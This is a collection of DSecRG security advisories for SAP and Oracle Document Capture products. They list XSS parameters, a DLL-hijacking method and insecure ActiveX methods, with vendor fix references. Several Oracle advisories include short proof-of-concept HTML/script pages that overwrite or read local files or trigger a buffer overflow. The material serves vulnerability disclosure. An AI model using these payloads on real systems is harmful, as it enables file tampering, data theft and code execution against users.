www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS

[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS

SAP NetWeaver Integration Directory has linked XSS vulnerability.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-013 (Internal
DSecRG-00163)

Application: SAP NetWeaver Runtime
Versions Affected: SAP NetWeaver Runtime
Vendor URL: http://www.sap.com
Bugs:Linked XSS and Stored XSS
Exploits:YES
Reported:11.05.2010
Vendor response: 12.05.2010
Date of Public Advisory:09.03.2011
CVE-number:
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)

Description
***
SAP NetWeaver Integration Directory has linked XSS vulnerability.

1. XSS in error_msg.jsp
2. XSS in ViewCaches.jsp
3. Stored XSS in ViewLogger.jsp
4. POST and Stored XSS in ShowMemLog

Details
***
1. Vulnerable script: error_msg.jsp
Vulnerable parameters: id

2. Vulnerable script: ViewCaches.jsp
Vulnerable parameters: refresh
3. Vulnerable script: ViewLogger.jsp
Vulnerable parameters: logger
4. Vulnerable servlet: ShowMemLog
Vulnerable parameters: thread, class (stored xss), invert, filter

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security
scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=313
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1512776

Fix Information
*
Solution to this issue is given in the 1512776 security note.

About
*
Digital Security:
Is one of the leading IT security companies in CEMEA, providing information
security consulting, audit and penetration testing services, ERP and SAP
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA
DSS standards.

Digital Security Research Group:
International subdivision of Digital Security company focused on research and
software development for securing business-critical systems like: enterprise
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking
software. DSecRG developed new product ERPSCAN security suite for SAP and
service ERPSCAN Online which can help customers to perform automated security
assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com

Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru

[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS

[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS

SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-012 ( Internal
DSecRG-00159)

Application: SAP NetWeaver XI
Versions Affected: SAP NetWeaver XI
Vendor URL: http://www.sap.com
Bugs:XSS
Exploits:YES
Reported:09.06.2010
Vendor response: 10.06.2010
Date of Public Advisory:09.03.2011
CVE-number:
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG]
(research [at] dsec rg[dot] com)

Description
***
SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities.
Details
***
1. Vulnerable servlet: CheckService
Vulnerable parameters: fileNameL, directoryNameL
2. Vulnerable servlet: ExportabilityCheck
Vulnerable parameters: fileNameL, directoryNameL
3. Vulnerable servlet: ViewCaches
Vulnerable parameters: XiDynPage_ThreadId
4. Vulnerable servlet: ShowMemLog
Vulnerable parameters: thread

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security
scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=312
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/ 1512776

Fix Information
*
Solution to this issue is given in the 1512776 security note.
About
*
Digital Security:
Is one of the leading IT security companies in CEMEA, providing information
security consulting, audit and penetration testing services, ERP and SAP
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA
DSS standards.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com

Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru

[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking

[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking

SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking
attacks. It makes possible to remote code execution

Digital Security Research Group [DSecRG] Advisory DSecRG-11-014 (Internal
DSecRG-00183)

Application: SAP GUI
Versions Affected: 6.4 - 7.2
Vendor URL: http://www.sap.com
Bugs:DLL hijacking
Exploits:YES
Reported:24.08.2010
Vendor response: 26.08.2010
Date of Public Advisory:09.03.2011
CVE-number:
Author: Alexey Sintsov, Alexandr Polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking
attacks. It makes possible to remote code execution.

Details
***
Attacker can place shortcuts for SAP GUI (.sap) on his share directory. In the
same directory he place DLL's with evil code.
Name of DLL will be MFC80RUS.DLL(for Russian systems) or MFC80LOC.DLL for
SAPGui.exe. Than attacker get link to shortcut to a victim. When victim try to
open shortcuts, SAP application try to load it DLL's from working dir that is
attacker share directory. So attacker's DLL's will be loaded by victim and evil
code from this libraries will be executed. It is because SAPGui.exe and
BExAnalyzer.exe try to find the directory in work path before system
directories.

References
**
http://dsecrg.com/pages/vul/show.php?id=314
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1511179

Fix Information
*
Solution to this issue is given in the 1511179 security note.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com

Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru

[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS

[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS 

SAP Crystal Report Server 2008 - multiple cross-site scripting vulnerabilities. 

SAP Crystal Report Server 2008 - Multiple cross-site scripting vulnerabilities. 
[DSecRG-11-011] (Internal DSECRG-00147) 


Multiple XSS vulnerabilities found in the module PerformanceManagement 
application SAP Crystal Report Server 2008. An attacker can intercept the 
cookie administrator or regular user of the system. 

Application: SAP Crystal Report Server 2008 
Versions Affected: SAP Crystal Report Server 2008 
Vendor URL:  http://www.sap.com 
Bugs: Linked XSS Vulnerability 
Exploits:YES 
Reported: 06.08.2010 
Vendor response: 07.08.2010
Date of Public Advisory: 09.03.2011
Authors: Dmitriy Chastuhin 
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) 

Details 
*** 
Using the discovered vulnerabilities, an attacker can intercept the cookie and 
perform any administrative actions in the system on its behalf. 

1. cross-site scripting vulnerability found in script aa-add-analytic2.jsp 
Vulnerable GET parameter backURL
2 cross-site scripting vulnerability found in script aa-add-validate.jsp 
Vulnerable GET parameter pagePos 
3 cross-site scripting vulnerability found in script 
aa-analytic-frameset.jsp.jsp 
Vulnerable GET parameter entry 
4 cross-site scripting vulnerability found in script aa-cacheparams.jsp 

Vulnerable GET parameters MetaDataCachePeriod, AppBuilderCachePeriod, 
SessionCachePeriod, RefreshDashboardPeriod 
5 cross-site scripting vulnerability found in script aa-display-flash.jsp 
Vulnerable GET parameter swf 
6 cross-site scripting vulnerability found in script aa-dmgraph.jsp 
Vulnerable GET parameter Sel 
7 cross-site scripting vulnerability found in script aa-edit-goal.jsp 
Vulnerable GET parameter defTar 
8 cross-site scripting vulnerability found in script aa-map-frameset.jsp 
Vulnerable GET parameter analyticToken 
9 cross-site scripting vulnerability found in script aa-open-inlist.jsp 
Vulnerable GET parameters url, sWindow, BEGIN_DATE, END_DATE, 
CURRENT_DATE, CURRENT_SLICE 
10 cross-site scripting vulnerability found in script aa-overviewctxt.jsp 
Vulnerable GET parameters DocName, Label 


Example:
**
Working exploit will be available in commercial scanner ERPSCAN security 
scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=311
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1509610


Fix Information
*
Solution to this issue is given in the 1509610 security note.

About
*
Digital Security: 
Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:
International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP and 
service ERPSCAN Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com



Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-009] SAP NetWaver XI SOAP Adapter - XSS

2011-03-14 Thread Alexandr Polyakov

[DSECRG-11-009] SAP NetWaver XI SOAP Adapter - XSS 

SAP NetWeaver 7.0 application XI SOAP Adapter has linked XSS vulnerability 

Digital Security Research Group [DSecRG] Advisory DSecRG-11-009 (Internal 
DSecRG-00120)

Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver XI SOAP Adapter 3.0-7.11
Vendor URL:  http://www.sap.com
Bugs:XSS
Exploits:YES
Reported:25.01.2010
Vendor response: 25.01.2010 
Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Dmitriy Evdokimov from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)

Description
***
SAP Netweaver 70 application XI SOAP Adapter (com.sap.aii.af.soapadapter) has 
linked XSS vulnerability.
Details
***
Vulnerable script: HelperServlet
Vulnerable parameters: action

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security 
scanner for SAP (ERPSCAN.com).

References
**

http://dsecrg.com/pages/vul/show.php?id=309
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1438191

Fix Information
*
Solution to this issue is given in the 1438191 security note.

About
*
Digital Security: 
Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:
International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP and 
service ERPSCAN Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com







Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-010] SAP NetWeaver logon.html - XSS

2011-03-14 Thread Alexandr Polyakov


[DSECRG-11-010] SAP NetWeaver logon.html - XSS 

SAP NetWeaver BSP logon page has linked XSS vulnerability. 

Digital Security Research Group [DSecRG] Advisory DSecRG-11-010 (Internal 
DSecRG-00127)
Application: SAP NetWeaver 
Versions Affected:   SAP NetWeaver SAP_BASIS 620-730 
Vendor URL:  http://www.sap.com
Bugs:XSS
Exploits:YES
Reported:05.02.2010
Vendor response: 06.02.2010
Date of Public Advisory:09.03.2011
CVE-number: 
Author:  Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP NetWeaver BSP logon page has linked XSS vulnerability.

Details
***
There were found another one vulnerability like described in note 887168 and 
note 887164
but this vulnerability is on another parameter.
Vulnerable variable: logonUrl
Vulnerable page: /sap/bc/public/bsp/sap/system_public/logon.htm

Attacker can send link to administrator and get his cookie.

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security 
scanner for SAP (ERPSCAN.com)

References
**
http://dsecrg.com/pages/vul/show.php?id=310
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1450270

Fix Information
*
Solution to this issue is given in the 1450270 security note.

About
*
Digital Security: 
Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:
International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP and 
service ERPSCAN Online which can help customers to perform automated security 
assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com





Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-00153] Oracle Document Capture Actbar2.ocx - insecure method

ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory #DSECRG-00153



Application:Oracle Document Capture
Versions Affected:  Release 10gR3
Vendor URL: www.oracle.com
Bugs:   insecure method, File overwriting
Exploits:   YES
Reported:   22.03.2010
Vendor response:31.03.2010
Date of Public Advisory:24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group 
[DSecRG] (research [at] dsecrg [dot] com)



Description
***

Oracle Document Capture contains ActiveX components that contains insecure 
methods.

Insecure method in Actbar2.ocx


Details
***

Oracle Document Capture contains ActiveX component ActiveBar2Library 
(Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}

which is contains insecure method SaveLayoutChanges that can overwrite any 
unhidden file in system. 

Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False



Exploit
***

Attacker can construct html page which call vulnerable function 
SaveLayoutChanges from ActiveX component Actbar2.ocx

Example:

HTML
 HEAD
 TITLEDSecRG/TITLE
 /HEAD
 BODY
 
 OBJECT id='eds' 
classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'/OBJECT
 
 SCRIPT
 
 function Exploit(){
 eds.SaveLayoutChanges(C:\\31337.txt,1); 
 }
 Exploit();
 
 /SCRIPT
/BODY
/HTML



References
**

http://dsecrg.com/pages/vul/show.php?id=304
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP 
NetWeaver and service ERPSCAN Online which can help customers to perform 
automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com





Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-006] Oracle Document Capture ActiveX - Insecure method, buffer overflow

ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal 
#DSECRG-09-066) 


Application:Oracle Document Capture 
Versions Affected:  Oracle Document Capture 10.1.3.5
Vendor URL: http://oracle.com
Bugs:   Insecure method. Buffer overflow.
Exploits:   YES
Reported:   14.12.2009
Vendor response:15.12.2009
Date of Public Advisory:24.01.2011
CVE:CVE-2010-3599
Author: Alexandr Polyakov from DSecRG 

Description
***

Insecure method was founded in NCSECWLib ActiveX control component which is a 
part of  Oracle Document Capture .
One of the methods (WriteJPG) can be used to overwrite files on users system 
and also affected to buffer overflow.




Details
***

Attacker can construct html page which call vulnerable function WriteJPG from 
ActiveX Object NCSECWLib.

Example 1 (file overwrite)
*** 


html
script
targetFile = C:\Program Files\Oracle\Document Capture\NCSEcw.dll
prototype  = Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As 
Long ,  ByVal bWriteWorldFile As Boolean )
memberName = WriteJPG
progid = NCSECWLib.NCSRenderer
argCount   = 3

arg1=c:\boot.ini
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3 

/script
/html


Example 2
***

html
script
targetFile = C:\Program Files\Oracle\Document Capture\NCSEcw.dll
prototype  = Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As 
Long ,  ByVal bWriteWorldFile As Boolean )
memberName = WriteJPG
progid = NCSECWLib.NCSRenderer
argCount   = 3

arg1=String(13332, A)
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3 

/script/job/package


References
**

http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP 
NetWeaver and service ERPSCAN Online which can help customers to perform 
automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com



Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files


Digital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal 
#DSECRG-00117)


Application:Oracle Document Capture  
Versions Affected:  10.1350.0005
Vendor URL: 
http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs:   Insecure READ method
Exploits:   YES
Reported:   29.01.2010 
Second report:  02.02.2010
Date of Public Advisory:24.01.2010  
CVE:CVE-2010-3595
Authors:Alexey Sintsov
by Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)



Description
***

EasyMail ActiveX  Control (emsmtp.dll)  that included into Oracle Document 
Capture distrib
can be used to read any file in target system. Vulnerable method is 
ImportBodyText().



Details
***

For example if you enter filename C:\\boot.ini in ImportBodyText method 
then control will 
open and read file C:\boot.ini. Content of boot.ini will be loaded into 
property BodyText .


Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False



Example:
***

HTML
HEAD
TITLEDSECRG/TITLE
/HEAD
BODY

OBJECT id='ora' 
classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'/OBJECT

SCRIPT

function Exploit(){
ora.ImportBodyText(C:\\boot.ini); 
document.write(Try to read 
c:\\boot.ini:brbr+ora.BodyText);
}
Exploit();

/SCRIPT
/BODY
/HTML



References
**

http://dsecrg.com/pages/vul/show.php?id=307
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP 
NetWeaver and service ERPSCAN Online which can help customers to perform 
automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com






Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---

[DSECRG-00143] SAP Crystal Reports 2008 - ActiveX insecure methods

[DSECRG-11-002] (Internal DSECRG-00143) SAP Crystal Report Server 2008
scriptinghelpers.dll ActiveX component - Insecure methods

The component contains insecure methods by which you can overwrite any file in
the OS, run the executable file, kill process, delete the file.

Application:SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://sap.com
Bugs: insecure methods
Exploits: YES
Reported: 09.03.2010
Vendor response:10.03.2010
Date of SAPNOTE Published: 8.10.2010
Date of Public Advisory: 14.01.2011
Authors:Dmitry Chastuhin
Digital Security Research Group [DSecRG] (research [at]
dsecrg [dot] com)

Description

SAP Crystal Report Server 2008 contains a variety of features with which users
can manage and share interactive reports and dashboards, as well as provide
access to them via the Internet.

Details
**
Insecure practices found in the library scriptinghelpers.dll. An attacker could
construct a html-page containing a call Insecure functions.

1 Insecure method CreateTextFile. Perhaps as the creation and overwrite
existing files.
Sample
**

2 Insecure method LaunchProgram. Possible to run an executable file.

3 Insecure Method DeleteFile. Possible removal of any file in the OS.

4 Insecure method Kill. Perhaps the completion of any process, if we know the
pid

References
**

http://dsecrg.com/pages/vul/show.php?id=302
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1458309

Fix Information
*

Solution to this issue is given in the 1458309 security note.

About
*

Digital Security:

Is one of the leading IT security companies in CEMEA, providing information
security consulting, audit and penetration testing services, ERP and SAP
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and
software development for securing business-critical systems like: enterprise
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking
software. DSecRG developed new product ERPSCAN security suite for SAP
NetWeaver and service ERPSCAN Online which can help customers to perform
automated security assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com

Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru

[DSECRG-11-005] Oracle Document Capture empop3.dll - insecure method


ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal 
#DSECRG-00154) 


Application:Oracle Document Capture
Versions Affected:  Release 10gR3
Vendor URL: www.oracle.com
Bugs:   insecure method, File overwriting, File deleting
Exploits:   YES
Reported:   22.03.2010
Vendor response:31.03.2010
Date of Public Advisory:24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group 
[DSecRG] (research [at] dsecrg [dot] com)



Description
***

Oracle Document Capture contains ActiveX components that contains insecure 
methods in empop3.dll


Details
***


Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib 
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}

which is contains insecure method DownloadSingleMessageToFile that can delete 
any file in system. 

Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False



Details
***

Attacker can construct html page which call vulnerable function 
DownloadSingleMessageToFile from ActiveX component empop3.dll

Example:

HTML
 HEAD
 TITLEDSecRG/TITLE
 /HEAD
 BODY
 
 OBJECT id='eds' 
classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'/OBJECT
 
 SCRIPT
 
 function Exploit(){
 eds.DownloadSingleMessageToFile(1,C:\\boot.ini,1);   
   
 }
 Exploit();
 
 /SCRIPT
/BODY
/HTML


References
**

http://dsecrg.com/pages/vul/show.php?id=305
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*

Digital Security: 

Is one of the leading IT security companies in CEMEA, providing information 
security consulting, audit and penetration testing services, ERP and SAP 
security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA 
DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and 
software development for securing business-critical systems like: enterprise 
applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking 
software. DSecRG developed new product ERPSCAN security suite for SAP 
NetWeaver and service ERPSCAN Online which can help customers to perform 
automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com




Polyakov Alexandr. PCI QSA,PA-QSA
